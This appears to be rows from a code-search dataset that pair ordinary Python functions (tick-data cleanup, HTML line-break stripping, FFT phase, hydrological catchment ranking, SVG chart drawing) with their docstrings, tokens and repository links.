[ "def", "_fix_history_sequence", "(", "self", ",", "df", ",", "table", ")", ":", "# remove \"Unnamed: x\" columns", "cols", "=", "df", ".", "columns", "[", "df", ".", "columns", ".", "str", ".", "startswith", "(", "'Unnamed:'", ")", "]", ".", "tolist", "(", ")", "df", ".", "drop", "(", "cols", ",", "axis", "=", "1", ",", "inplace", "=", "True", ")", "# remove future dates", "df", "[", "'datetime'", "]", "=", "pd", ".", "to_datetime", "(", "df", "[", "'datetime'", "]", ",", "utc", "=", "True", ")", "blacklist", "=", "df", "[", "df", "[", "'datetime'", "]", ">", "pd", ".", "to_datetime", "(", "'now'", ",", "utc", "=", "True", ")", "]", "df", "=", "df", ".", "loc", "[", "set", "(", "df", ".", "index", ")", "-", "set", "(", "blacklist", ")", "]", "# .tail()", "# loop through data, symbol by symbol", "dfs", "=", "[", "]", "bad_ids", "=", "[", "blacklist", "[", "'id'", "]", ".", "values", ".", "tolist", "(", ")", "]", "for", "symbol_id", "in", "list", "(", "df", "[", "'symbol_id'", "]", ".", "unique", "(", ")", ")", ":", "data", "=", "df", "[", "df", "[", "'symbol_id'", "]", "==", "symbol_id", "]", ".", "copy", "(", ")", "# sort by id", "data", ".", "sort_values", "(", "'id'", ",", "axis", "=", "0", ",", "ascending", "=", "True", ",", "inplace", "=", "False", ")", "# convert index to column", "data", ".", "loc", "[", ":", ",", "\"ix\"", "]", "=", "data", ".", "index", "data", ".", "reset_index", "(", "inplace", "=", "True", ")", "# find out of sequence ticks/bars", "malformed", "=", "data", ".", "shift", "(", "1", ")", "[", "(", "data", "[", "'id'", "]", ">", "data", "[", "'id'", "]", ".", "shift", "(", "1", ")", ")", "&", "(", "data", "[", "'datetime'", "]", "<", "data", "[", "'datetime'", "]", ".", "shift", "(", "1", ")", ")", "]", "# cleanup rows", "if", "malformed", ".", "empty", ":", "# if all rows are in sequence, just remove last row", "dfs", ".", "append", "(", "data", ")", "else", ":", "# remove out of sequence rows + last row from data", "index", "=", "[", "x", "for", "x", "in", "data", ".", "index", ".", "values", "if", "x", "not", "in", "malformed", "[", "'ix'", "]", ".", "values", "]", "dfs", ".", "append", "(", "data", ".", "loc", "[", "index", "]", ")", "# add to bad id list (to remove from db)", "bad_ids", ".", "append", "(", "list", "(", "malformed", "[", "'id'", "]", ".", "values", ")", ")", "# combine all lists", "data", "=", "pd", ".", "concat", "(", "dfs", ",", "sort", "=", "True", ")", "# flatten bad ids", "bad_ids", "=", "sum", "(", "bad_ids", ",", "[", "]", ")", "# remove bad ids from db", "if", "bad_ids", ":", "bad_ids", "=", "list", "(", "map", "(", "str", ",", "map", "(", "int", ",", "bad_ids", ")", ")", ")", "self", ".", "dbcurr", ".", "execute", "(", "\"DELETE FROM greeks WHERE %s IN (%s)\"", "%", "(", "table", ".", "lower", "(", ")", "[", ":", "-", "1", "]", "+", "\"_id\"", ",", "\",\"", ".", "join", "(", "bad_ids", ")", ")", ")", "self", ".", "dbcurr", ".", "execute", "(", "\"DELETE FROM \"", "+", "table", ".", "lower", "(", ")", "+", "\" WHERE id IN (%s)\"", "%", "(", "\",\"", ".", "join", "(", "bad_ids", ")", ")", ")", "try", ":", "self", ".", "dbconn", ".", "commit", "(", ")", "except", "Exception", "as", "e", ":", "self", ".", "dbconn", ".", "rollback", "(", ")", "# return", "return", "data", ".", "drop", "(", "[", "'id'", ",", "'ix'", ",", "'index'", "]", ",", "axis", "=", "1", ")" ]
fix out-of-sequence ticks/bars
[ "fix", "out", "-", "of", "-", "sequence", "ticks", "/", "bars" ]
python
train
36.015625
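The heart of the cleanup above is the out-of-sequence test: a row whose id grew while its timestamp went backwards. A simplified pandas sketch on toy data (it flags the offending row directly, rather than its predecessor as the original shift-based version does):

import pandas as pd

df = pd.DataFrame({
    'id': [1, 2, 3, 4],
    'datetime': pd.to_datetime(['2024-01-01 09:00', '2024-01-01 09:01',
                                '2024-01-01 08:59', '2024-01-01 09:02'], utc=True),
})

# Out of sequence: id increased but the timestamp moved backwards.
out_of_seq = (df['id'] > df['id'].shift(1)) & (df['datetime'] < df['datetime'].shift(1))
print(df[out_of_seq])        # the 08:59 row
clean = df[~out_of_seq]      # keep everything else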
totalgood/pugnlp
src/pugnlp/util.py
https://github.com/totalgood/pugnlp/blob/c43445b14afddfdeadc5f3076675c9e8fc1ee67c/src/pugnlp/util.py#L1413-L1448
def strip_br(s): r""" Strip the trailing html linebreak character (<BR />) from a string or sequence of strings A sequence of strings is assumed to be a row in a CSV/TSV file or words from a line of text so only the last element in a sequence is "stripped" >>> strip_br(' Title <BR> ') ' Title' >>> strip_br(list(range(1, 4))) [1, 2, 3] >>> strip_br((' Column 1<br />', ' Last Column < br / > ')) (' Column 1<br />', ' Last Column') >>> strip_br(['name', 'rank', 'serial\nnumber', 'date <BR />']) ['name', 'rank', 'serial\nnumber', 'date'] >>> strip_br(None) >>> strip_br([]) [] >>> strip_br(()) () >>> strip_br(('one element<br>',)) ('one element',) """ if isinstance(s, basestring): return re.sub(r'\s*<\s*[Bb][Rr]\s*[/]?\s*>\s*$', '', s) elif isinstance(s, (tuple, list)): # strip just the last element in a list or tuple try: return type(s)(list(s)[:-1] + [strip_br(s[-1])]) except (IndexError, ValueError, AttributeError, TypeError): # len(s) == 0 return s else: try: return type(s)(strip_br(str(s))) except (IndexError, ValueError, AttributeError, TypeError): # s is None return s
[ "def", "strip_br", "(", "s", ")", ":", "if", "isinstance", "(", "s", ",", "basestring", ")", ":", "return", "re", ".", "sub", "(", "r'\\s*<\\s*[Bb][Rr]\\s*[/]?\\s*>\\s*$'", ",", "''", ",", "s", ")", "elif", "isinstance", "(", "s", ",", "(", "tuple", ",", "list", ")", ")", ":", "# strip just the last element in a list or tuple", "try", ":", "return", "type", "(", "s", ")", "(", "list", "(", "s", ")", "[", ":", "-", "1", "]", "+", "[", "strip_br", "(", "s", "[", "-", "1", "]", ")", "]", ")", "except", "(", "IndexError", ",", "ValueError", ",", "AttributeError", ",", "TypeError", ")", ":", "# len(s) == 0", "return", "s", "else", ":", "try", ":", "return", "type", "(", "s", ")", "(", "strip_br", "(", "str", "(", "s", ")", ")", ")", "except", "(", "IndexError", ",", "ValueError", ",", "AttributeError", ",", "TypeError", ")", ":", "# s is None", "return", "s" ]
r""" Strip the trailing html linebreak character (<BR />) from a string or sequence of strings A sequence of strings is assumed to be a row in a CSV/TSV file or words from a line of text so only the last element in a sequence is "stripped" >>> strip_br(' Title <BR> ') ' Title' >>> strip_br(list(range(1, 4))) [1, 2, 3] >>> strip_br((' Column 1<br />', ' Last Column < br / > ')) (' Column 1<br />', ' Last Column') >>> strip_br(['name', 'rank', 'serial\nnumber', 'date <BR />']) ['name', 'rank', 'serial\nnumber', 'date'] >>> strip_br(None) >>> strip_br([]) [] >>> strip_br(()) () >>> strip_br(('one element<br>',)) ('one element',)
[ "r", "Strip", "the", "trailing", "html", "linebreak", "character", "(", "<BR", "/", ">", ")", "from", "a", "string", "or", "sequence", "of", "strings" ]
python
train
34.472222
pmacosta/peng
peng/wave_functions.py
https://github.com/pmacosta/peng/blob/976935377adaa3de26fc5677aceb2cdfbd6f93a7/peng/wave_functions.py#L728-L782
def fftp(wave, npoints=None, indep_min=None, indep_max=None, unwrap=True, rad=True): r""" Return the phase of the Fast Fourier Transform of a waveform. :param wave: Waveform :type wave: :py:class:`peng.eng.Waveform` :param npoints: Number of points to use in the transform. If **npoints** is less than the size of the independent variable vector the waveform is truncated; if **npoints** is greater than the size of the independent variable vector, the waveform is zero-padded :type npoints: positive integer :param indep_min: Independent vector start point of computation :type indep_min: integer or float :param indep_max: Independent vector stop point of computation :type indep_max: integer or float :param unwrap: Flag that indicates whether phase should change phase shifts to their :code:`2*pi` complement (True) or not (False) :type unwrap: boolean :param rad: Flag that indicates whether phase should be returned in radians (True) or degrees (False) :type rad: boolean :rtype: :py:class:`peng.eng.Waveform` .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]] .. Auto-generated exceptions documentation for .. peng.wave_functions.fftp :raises: * RuntimeError (Argument \`indep_max\` is not valid) * RuntimeError (Argument \`indep_min\` is not valid) * RuntimeError (Argument \`npoints\` is not valid) * RuntimeError (Argument \`rad\` is not valid) * RuntimeError (Argument \`unwrap\` is not valid) * RuntimeError (Argument \`wave\` is not valid) * RuntimeError (Incongruent \`indep_min\` and \`indep_max\` arguments) * RuntimeError (Non-uniform sampling) .. [[[end]]] """ return phase(fft(wave, npoints, indep_min, indep_max), unwrap=unwrap, rad=rad)
[ "def", "fftp", "(", "wave", ",", "npoints", "=", "None", ",", "indep_min", "=", "None", ",", "indep_max", "=", "None", ",", "unwrap", "=", "True", ",", "rad", "=", "True", ")", ":", "return", "phase", "(", "fft", "(", "wave", ",", "npoints", ",", "indep_min", ",", "indep_max", ")", ",", "unwrap", "=", "unwrap", ",", "rad", "=", "rad", ")" ]
r""" Return the phase of the Fast Fourier Transform of a waveform. :param wave: Waveform :type wave: :py:class:`peng.eng.Waveform` :param npoints: Number of points to use in the transform. If **npoints** is less than the size of the independent variable vector the waveform is truncated; if **npoints** is greater than the size of the independent variable vector, the waveform is zero-padded :type npoints: positive integer :param indep_min: Independent vector start point of computation :type indep_min: integer or float :param indep_max: Independent vector stop point of computation :type indep_max: integer or float :param unwrap: Flag that indicates whether phase should change phase shifts to their :code:`2*pi` complement (True) or not (False) :type unwrap: boolean :param rad: Flag that indicates whether phase should be returned in radians (True) or degrees (False) :type rad: boolean :rtype: :py:class:`peng.eng.Waveform` .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]] .. Auto-generated exceptions documentation for .. peng.wave_functions.fftp :raises: * RuntimeError (Argument \`indep_max\` is not valid) * RuntimeError (Argument \`indep_min\` is not valid) * RuntimeError (Argument \`npoints\` is not valid) * RuntimeError (Argument \`rad\` is not valid) * RuntimeError (Argument \`unwrap\` is not valid) * RuntimeError (Argument \`wave\` is not valid) * RuntimeError (Incongruent \`indep_min\` and \`indep_max\` arguments) * RuntimeError (Non-uniform sampling) .. [[[end]]]
[ "r", "Return", "the", "phase", "of", "the", "Fast", "Fourier", "Transform", "of", "a", "waveform", "." ]
python
test
34.363636
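Without peng's Waveform type, the same phase-of-FFT idea can be sketched directly with NumPy; np.unwrap plays the role of the unwrap flag and np.degrees of rad=False (the sample rate and signal below are made up):

import numpy as np

fs = 8000.0                              # assumed sample rate
t = np.arange(256) / fs
x = np.sin(2 * np.pi * 1000.0 * t)       # 1 kHz tone

spectrum = np.fft.fft(x)
phase = np.unwrap(np.angle(spectrum))    # unwrap=True equivalent
phase_deg = np.degrees(phase)            # rad=False equivalent
print(phase_deg[:4])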
christophertbrown/bioscripts
ctbBio/transform.py
https://github.com/christophertbrown/bioscripts/blob/83b2566b3a5745437ec651cd6cafddd056846240/ctbBio/transform.py#L95-L105
def norm(table): """ fit to normal distribution """ print('# norm dist is broken', file=sys.stderr) exit() from matplotlib.pyplot import hist as hist t = [] for i in table: t.append(np.ndarray.tolist(hist(i, bins = len(i), normed = True)[0])) return t
[ "def", "norm", "(", "table", ")", ":", "print", "(", "'# norm dist is broken'", ",", "file", "=", "sys", ".", "stderr", ")", "exit", "(", ")", "from", "matplotlib", ".", "pyplot", "import", "hist", "as", "hist", "t", "=", "[", "]", "for", "i", "in", "table", ":", "t", ".", "append", "(", "np", ".", "ndarray", ".", "tolist", "(", "hist", "(", "i", ",", "bins", "=", "len", "(", "i", ")", ",", "normed", "=", "True", ")", "[", "0", "]", ")", ")", "return", "t" ]
fit to normal distribution
[ "fit", "to", "normal", "distribution" ]
python
train
25.909091
ljcooke/see
see/tools.py
https://github.com/ljcooke/see/blob/4cbc67a31c92367977ecb4bbb1f0736fa688a6ba/see/tools.py#L16-L27
def char_width(char): """ Get the display length of a unicode character. """ if ord(char) < 128: return 1 elif unicodedata.east_asian_width(char) in ('F', 'W'): return 2 elif unicodedata.category(char) in ('Mn',): return 0 else: return 1
[ "def", "char_width", "(", "char", ")", ":", "if", "ord", "(", "char", ")", "<", "128", ":", "return", "1", "elif", "unicodedata", ".", "east_asian_width", "(", "char", ")", "in", "(", "'F'", ",", "'W'", ")", ":", "return", "2", "elif", "unicodedata", ".", "category", "(", "char", ")", "in", "(", "'Mn'", ",", ")", ":", "return", "0", "else", ":", "return", "1" ]
Get the display length of a unicode character.
[ "Get", "the", "display", "length", "of", "a", "unicode", "character", "." ]
python
train
23.833333
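The width rule above can be exercised standalone with just the standard library; a quick sketch:

import unicodedata

def char_width(char):
    # ASCII: one column; East Asian Fullwidth/Wide: two; combining marks: zero.
    if ord(char) < 128:
        return 1
    if unicodedata.east_asian_width(char) in ('F', 'W'):
        return 2
    if unicodedata.category(char) in ('Mn',):
        return 0
    return 1

print(char_width('a'), char_width('漢'), char_width('\u0301'))   # 1 2 0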
OpenHydrology/floodestimation
floodestimation/collections.py
https://github.com/OpenHydrology/floodestimation/blob/782da7c5abd1348923129efe89fb70003ebb088c/floodestimation/collections.py#L118-L173
def most_similar_catchments(self, subject_catchment, similarity_dist_function, records_limit=500, include_subject_catchment='auto'): """ Return a list of catchments sorted by hydrological similarity defined by `similarity_distance_function` :param subject_catchment: subject catchment to find similar catchments for :type subject_catchment: :class:`floodestimation.entities.Catchment` :param similarity_dist_function: a method returning a similarity distance measure with 2 arguments, both :class:`floodestimation.entities.Catchment` objects :param include_subject_catchment: - `auto`: include subject catchment if suitable for pooling and if urbext < 0.03 - `force`: always include subject catchment having at least 10 years of data - `exclude`: do not include the subject catchment :type include_subject_catchment: str :return: list of catchments sorted by similarity :type: list of :class:`floodestimation.entities.Catchment` """ if include_subject_catchment not in ['auto', 'force', 'exclude']: raise ValueError("Parameter `include_subject_catchment={}` invalid.".format(include_subject_catchment) + "Must be one of `auto`, `force` or `exclude`.") query = (self.db_session.query(Catchment). join(Catchment.descriptors). join(Catchment.amax_records). filter(Catchment.id != subject_catchment.id, Catchment.is_suitable_for_pooling, or_(Descriptors.urbext2000 < 0.03, Descriptors.urbext2000 == None), AmaxRecord.flag == 0). group_by(Catchment). having(func.count(AmaxRecord.catchment_id) >= 10)) # At least 10 AMAX records catchments = query.all() # Add subject catchment if required (may not exist in database, so add after querying db if include_subject_catchment == 'force': if len(subject_catchment.amax_records) >= 10: # Never include short-record catchments catchments.append(subject_catchment) elif include_subject_catchment == 'auto': if len(subject_catchment.amax_records) >= 10 and subject_catchment.is_suitable_for_pooling and \ (subject_catchment.descriptors.urbext2000 < 0.03 or subject_catchment.descriptors.urbext2000 is None): catchments.append(subject_catchment) # Store the similarity distance as an additional attribute for each catchment for catchment in catchments: catchment.similarity_dist = similarity_dist_function(subject_catchment, catchment) # Then simply sort by this attribute catchments.sort(key=attrgetter('similarity_dist')) # Limit catchments until total amax_records counts is at least `records_limit`, default 500 amax_records_count = 0 catchments_limited = [] for catchment in catchments: catchments_limited.append(catchment) amax_records_count += catchment.record_length if amax_records_count >= records_limit: break return catchments_limited
[ "def", "most_similar_catchments", "(", "self", ",", "subject_catchment", ",", "similarity_dist_function", ",", "records_limit", "=", "500", ",", "include_subject_catchment", "=", "'auto'", ")", ":", "if", "include_subject_catchment", "not", "in", "[", "'auto'", ",", "'force'", ",", "'exclude'", "]", ":", "raise", "ValueError", "(", "\"Parameter `include_subject_catchment={}` invalid.\"", ".", "format", "(", "include_subject_catchment", ")", "+", "\"Must be one of `auto`, `force` or `exclude`.\"", ")", "query", "=", "(", "self", ".", "db_session", ".", "query", "(", "Catchment", ")", ".", "join", "(", "Catchment", ".", "descriptors", ")", ".", "join", "(", "Catchment", ".", "amax_records", ")", ".", "filter", "(", "Catchment", ".", "id", "!=", "subject_catchment", ".", "id", ",", "Catchment", ".", "is_suitable_for_pooling", ",", "or_", "(", "Descriptors", ".", "urbext2000", "<", "0.03", ",", "Descriptors", ".", "urbext2000", "==", "None", ")", ",", "AmaxRecord", ".", "flag", "==", "0", ")", ".", "group_by", "(", "Catchment", ")", ".", "having", "(", "func", ".", "count", "(", "AmaxRecord", ".", "catchment_id", ")", ">=", "10", ")", ")", "# At least 10 AMAX records", "catchments", "=", "query", ".", "all", "(", ")", "# Add subject catchment if required (may not exist in database, so add after querying db", "if", "include_subject_catchment", "==", "'force'", ":", "if", "len", "(", "subject_catchment", ".", "amax_records", ")", ">=", "10", ":", "# Never include short-record catchments", "catchments", ".", "append", "(", "subject_catchment", ")", "elif", "include_subject_catchment", "==", "'auto'", ":", "if", "len", "(", "subject_catchment", ".", "amax_records", ")", ">=", "10", "and", "subject_catchment", ".", "is_suitable_for_pooling", "and", "(", "subject_catchment", ".", "descriptors", ".", "urbext2000", "<", "0.03", "or", "subject_catchment", ".", "descriptors", ".", "urbext2000", "is", "None", ")", ":", "catchments", ".", "append", "(", "subject_catchment", ")", "# Store the similarity distance as an additional attribute for each catchment", "for", "catchment", "in", "catchments", ":", "catchment", ".", "similarity_dist", "=", "similarity_dist_function", "(", "subject_catchment", ",", "catchment", ")", "# Then simply sort by this attribute", "catchments", ".", "sort", "(", "key", "=", "attrgetter", "(", "'similarity_dist'", ")", ")", "# Limit catchments until total amax_records counts is at least `records_limit`, default 500", "amax_records_count", "=", "0", "catchments_limited", "=", "[", "]", "for", "catchment", "in", "catchments", ":", "catchments_limited", ".", "append", "(", "catchment", ")", "amax_records_count", "+=", "catchment", ".", "record_length", "if", "amax_records_count", ">=", "records_limit", ":", "break", "return", "catchments_limited" ]
Return a list of catchments sorted by hydrological similarity defined by `similarity_distance_function` :param subject_catchment: subject catchment to find similar catchments for :type subject_catchment: :class:`floodestimation.entities.Catchment` :param similarity_dist_function: a method returning a similarity distance measure with 2 arguments, both :class:`floodestimation.entities.Catchment` objects :param include_subject_catchment: - `auto`: include subject catchment if suitable for pooling and if urbext < 0.03 - `force`: always include subject catchment having at least 10 years of data - `exclude`: do not include the subject catchment :type include_subject_catchment: str :return: list of catchments sorted by similarity :type: list of :class:`floodestimation.entities.Catchment`
[ "Return", "a", "list", "of", "catchments", "sorted", "by", "hydrological", "similarity", "defined", "by", "similarity_distance_function" ]
python
train
59.357143
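Stripped of the SQLAlchemy query and suitability filters, the donor selection above is a sort by a similarity distance plus a running record-count cutoff. A toy sketch (the Catchment stand-in and the area-based distance are invented for illustration):

from collections import namedtuple

Catchment = namedtuple('Catchment', 'name record_length area')   # hypothetical minimal stand-in

def most_similar(subject, candidates, dist, records_limit=500):
    # Sort donors by distance to the subject, then keep adding catchments
    # until their pooled record length reaches records_limit.
    scored = sorted(candidates, key=lambda c: dist(subject, c))
    selected, total = [], 0
    for c in scored:
        selected.append(c)
        total += c.record_length
        if total >= records_limit:
            break
    return selected

subject = Catchment('subject', 40, 120.0)
donors = [Catchment('a', 300, 100.0), Catchment('b', 250, 500.0), Catchment('c', 200, 130.0)]
print([c.name for c in most_similar(subject, donors, dist=lambda s, c: abs(s.area - c.area))])
# ['c', 'a'] -- closest catchment areas first, stop once 500 station-years are pooled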
jaraco/svg.charts
svg/charts/plot.py
https://github.com/jaraco/svg.charts/blob/23053497b3f1af4e760f355050107ae3bc05909d/svg/charts/plot.py#L326-L340
def __draw_constant_line(self, value_label_style): "Draw a constant line on the y-axis with the label" value, label, style = value_label_style start = self.transform_output_coordinates((0, value))[1] stop = self.graph_width path = etree.SubElement(self.graph, 'path', { 'd': 'M 0 %(start)s h%(stop)s' % locals(), 'class': 'constantLine'}) if style: path.set('style', style) text = etree.SubElement(self.graph, 'text', { 'x': str(2), 'y': str(start - 2), 'class': 'constantLine'}) text.text = label
[ "def", "__draw_constant_line", "(", "self", ",", "value_label_style", ")", ":", "value", ",", "label", ",", "style", "=", "value_label_style", "start", "=", "self", ".", "transform_output_coordinates", "(", "(", "0", ",", "value", ")", ")", "[", "1", "]", "stop", "=", "self", ".", "graph_width", "path", "=", "etree", ".", "SubElement", "(", "self", ".", "graph", ",", "'path'", ",", "{", "'d'", ":", "'M 0 %(start)s h%(stop)s'", "%", "locals", "(", ")", ",", "'class'", ":", "'constantLine'", "}", ")", "if", "style", ":", "path", ".", "set", "(", "'style'", ",", "style", ")", "text", "=", "etree", ".", "SubElement", "(", "self", ".", "graph", ",", "'text'", ",", "{", "'x'", ":", "str", "(", "2", ")", ",", "'y'", ":", "str", "(", "start", "-", "2", ")", ",", "'class'", ":", "'constantLine'", "}", ")", "text", ".", "text", "=", "label" ]
Draw a constant line on the y-axis with the label
[ "Draw", "a", "constant", "line", "on", "the", "y", "-", "axis", "with", "the", "label" ]
python
test
34.466667
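The SVG produced by the method above can be reproduced with the standard library's ElementTree; the 300-unit graph width and the y position below are made-up values standing in for the chart's own geometry:

import xml.etree.ElementTree as etree

graph = etree.Element('g')
start, stop, label = 120, 300, 'threshold'

path = etree.SubElement(graph, 'path', {
    'd': 'M 0 %(start)s h%(stop)s' % locals(),
    'class': 'constantLine'})
text = etree.SubElement(graph, 'text', {
    'x': str(2), 'y': str(start - 2), 'class': 'constantLine'})
text.text = label

print(etree.tostring(graph).decode())
# e.g. <g><path d="M 0 120 h300" class="constantLine" /><text x="2" y="118" class="constantLine">threshold</text></g>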